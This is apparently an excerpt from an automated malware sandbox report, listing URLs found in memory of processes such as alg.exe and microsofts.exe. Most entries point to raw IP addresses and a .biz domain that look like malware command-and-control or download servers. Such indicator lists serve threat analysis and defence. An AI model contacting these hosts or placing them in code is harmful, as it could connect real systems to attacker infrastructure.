                        Source: alg.exe, 00000005.00000003.2708373210.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2756072991.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2744437728.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2727806558.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2697962787.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2687212186.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/boysd
                        Source: alg.exe, 00000005.00000003.2687212186.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/boysdS
                        Source: alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2661319349.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/glpq
                        Source: alg.exe, 00000005.00000003.2652374173.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2661319349.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ngs
                        Source: alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3137902301.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3081966970.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3170824073.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3159455853.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3067889124.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3100171023.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3160342270.00000000004D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://18.141.10.107/nhvixgstciqyn
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ovtsne
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ovtsne#
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ovtsne24.400
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/s7
                        Source: alg.exe, 00000005.00000003.2156875870.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/vrnakrk
                        Source: alg.exe, 00000005.00000003.2156875870.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/vrnakrkG
                        Source: alg.exe, 00000005.00000003.2156875870.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/vrnakrkbcc5fa
                        Source: alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/vtsneg
                        Source: alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3198048536.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3170824073.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3184983219.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3159455853.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3160342270.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3238419493.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/yadhctxanlnpjhwu
                        Source: alg.exe, 00000005.00000003.3160893686.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3157092791.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/yadhctxanlnpjhwuW
                        Source: alg.exe, 00000005.00000003.2958285127.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/afeeapyprlxrxabk
                        Source: alg.exe, 00000005.00000003.2447576365.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2448344378.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2437065367.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2437641494.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/aymirwrcjb
                        Source: alg.exe, 00000005.00000003.2686090293.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/boysd
                        Source: alg.exe, 00000005.00000003.2651348452.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/glpqI0
                        Source: alg.exe, 00000005.00000003.2251455515.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2214413376.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2213751146.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/ovtsne
                        Source: alg.exe, 00000005.00000003.3159455853.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/yadhctxanlnpjhwuP
                        Source: alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/
                        Source: alg.exe, 00000005.00000003.3227569968.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3213397923.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3228093863.00000000004D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/hbbreaeoihjkosw
                        Source: alg.exe, 00000005.00000003.2483443022.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/mjdasdrrrpdajiq
                        Source: alg.exe, 00000005.00000003.2484442464.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/mjdasdrrrpdajiqswq
                        Source: alg.exe, 00000005.00000003.2811918640.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789033998.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2835349419.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2834833089.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2726508164.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2802192029.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2753891566.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2823194050.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2772930707.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2707287809.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2743038137.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789664879.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2755280881.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2833788720.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/nmtgacidyycmw
                        Source: alg.exe, 00000005.00000003.2669009554.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2660006964.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/qwtkmqbsexpiki
                        Source: alg.exe, 00000005.00000003.3186324028.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/snxddmvolovsghkPp
                        Source: alg.exe, 00000005.00000003.2421987511.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2420603880.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2422385041.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/wpydads
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2866841244.00000000004C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/4s
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/b
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/kqmqy
                        Source: alg.exe, 00000005.00000003.2864839335.00000000004D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/obphwwtyxwxyphq
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/qmqy
                        Source: alg.exe, 00000005.00000003.3114457566.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/tmdyfv
                        Source: alg.exe, 00000005.00000003.2773708349.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789963972.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/wcjgm
                        Source: alg.exe, 00000005.00000003.2896087461.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/ix0
                        Source: alg.exe, 00000005.00000003.2389205186.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2387874066.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/kqmqy
                        Source: alg.exe, 00000005.00000003.2864839335.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/obphwwtyxwxyphqP
                        Source: alg.exe, 00000005.00000003.3098884658.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/tmdyfv0
                        Source: alg.exe, 00000005.00000003.2771431034.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2772930707.00000000004AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/wcjgm
                        Source: microsofts.exe, 00000003.00000003.2152690816.0000000005252000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2633585964.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2140213694.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2141054500.000000000048F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2173244629.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2631632756.00000000004BE000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2139729027.000000000048D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2651348452.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
                        Source: alg.exe, 00000005.00000003.2173244629.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/G
                        Source: alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/I
                        Source: alg.exe, 00000005.00000003.2197526720.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181861289.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2173244629.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2189038480.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2181313239.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2213889075.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/O
                        Source: alg.exe, 00000005.00000003.2140213694.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/S
                        Source: alg.exe, 00000005.00000003.2549986437.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/_
                        Source: microsofts.exe, 00000003.00000003.2152690816.000000000521F000.00000004.00000020.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2153701229.0000000005238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/bimwjsl
                        Source: microsofts.exe, 00000003.00000003.2152690816.000000000521F000.00000004.00000020.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2153701229.0000000005238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/bimwjsl4
                        Source: alg.exe, 00000005.00000002.3323105151.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/biwgwfhxqj
                        Source: alg.exe, 00000005.00000002.3323105151.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/biwgwfhxqjgs
                        Source: alg.exe, 00000005.00000003.3253265028.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000002.3335222393.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3283417082.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3274901650.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305228231.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3305846677.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3315495403.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3241193909.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3285380290.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3264636992.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3238419493.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/biwgwfhxqjkosw
                        Source: alg.exe, 00000005.00000003.2811918640.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2771431034.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2821864703.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789033998.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2835349419.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2834833089.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2726508164.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2802192029.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2753891566.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2823194050.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2772930707.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2743038137.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2789664879.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2755280881.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2833788720.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/eboqedbjpoqnvpqk
                        Source: alg.exe, 00000005.00000003.2669009554.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2660006964.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2651348452.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2698840513.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2696891139.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2707287809.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/eboqedbjpoqnvpqkK
                        Source: alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/exvjfnyxjxwq
                        Source: alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/exvjfnyxjxwqXwL
                        Source: alg.exe, 00000005.00000003.2633585964.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2596718696.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gs
                        Source: alg.exe, 00000005.00000003.2421364608.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/p
                        Source: alg.exe, 00000005.00000003.2173994587.000000000048A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2173244629.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2173035402.000000000048D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/pkljfdj
                        Source: alg.exe, 00000005.00000003.3049728278.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3039039021.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3137902301.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3081966970.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3108228485.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3067889124.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3100171023.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3098884658.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.3083445109.00000000004D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/rsstpsksfhdhf
                        Source: alg.exe, 00000005.00000003.2549986437.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/txk
                        Source: alg.exe, 00000005.00000002.3323105151.0000000000440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/txksfio
                        Source: alg.exe, 00000005.00000003.3240297723.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/biwgwfhxqj
                        Source: alg.exe, 00000005.00000003.2597665944.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2595969807.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/exvjfnyxjxwq
                        Source: microsofts.exe, 00000003.00000003.2153981776.000000000071A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/ltaudf
                        Source: alg.exe, 00000005.00000003.3037009789.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/rsstpsksfhdhf
                        Source: alg.exe, 00000005.00000003.2549193886.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/txk
                        Source: alg.exe, 00000005.00000002.3323105151.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/nuqhvreyT
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/;
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/G
                        Source: alg.exe, 00000005.00000003.2388676047.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2406699561.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/IP$L
                        Source: alg.exe, 00000005.00000003.2251795277.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/_
                        Source: alg.exe, 00000005.00000003.2331352758.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/dh
                        Source: alg.exe, 00000005.00000003.2370882102.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/dltqf
                        Source: alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/dltqfings
                        Source: alg.exe, 00000005.00000003.2331352758.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/gs
                        Source: alg.exe, 00000005.00000003.2331352758.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2371520323.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/hIO
                        Source: alg.exe, 00000005.00000003.2251795277.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/k
                        Source: alg.exe, 00000005.00000003.2421987511.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2330817097.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2251795277.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2372013511.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2372432615.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2389205186.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2406458559.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2407212765.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2420603880.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2387874066.00000000004B7000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2251455515.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2291072197.00000000004B8000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2410749727.00000000004B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/oiarwfji
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/s
                        Source: alg.exe, 00000005.00000003.2291777888.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290598797.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/tookpqdumsvuiv0
                        Source: alg.exe, 00000005.00000003.2290843040.000000000046C000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2291777888.000000000048A000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290598797.000000000048D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/tookpqdumsvuivi
                        Source: alg.exe, 00000005.00000003.2330817097.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2291777888.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290598797.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/tookpqdumsvuiviFy
                        Source: alg.exe, 00000005.00000003.2330817097.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/dh
                        Source: alg.exe, 00000005.00000003.2372432615.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2370882102.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/dltqf
                        Source: alg.exe, 00000005.00000003.2251455515.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/oiarwfji
                        Source: alg.exe, 00000005.00000003.2330817097.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2291777888.00000000004A3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000005.00000003.2290598797.00000000004A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/tookpqdumsvuivi
                        Source: alg.exe, 00000005.00000003.2847122391.00000000004AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.214.228.140:80/lscqqdljnyP
                        Source: powershell.exe, 0000000D.00000002.2188440741.0000000005AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000D.00000002.2182190776.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: alg.exe, 00000005.00000003.2421364608.0000000000436000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://saytjshyf.biz/
                        Source: build.exe, 00000006.00000002.3371472370.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
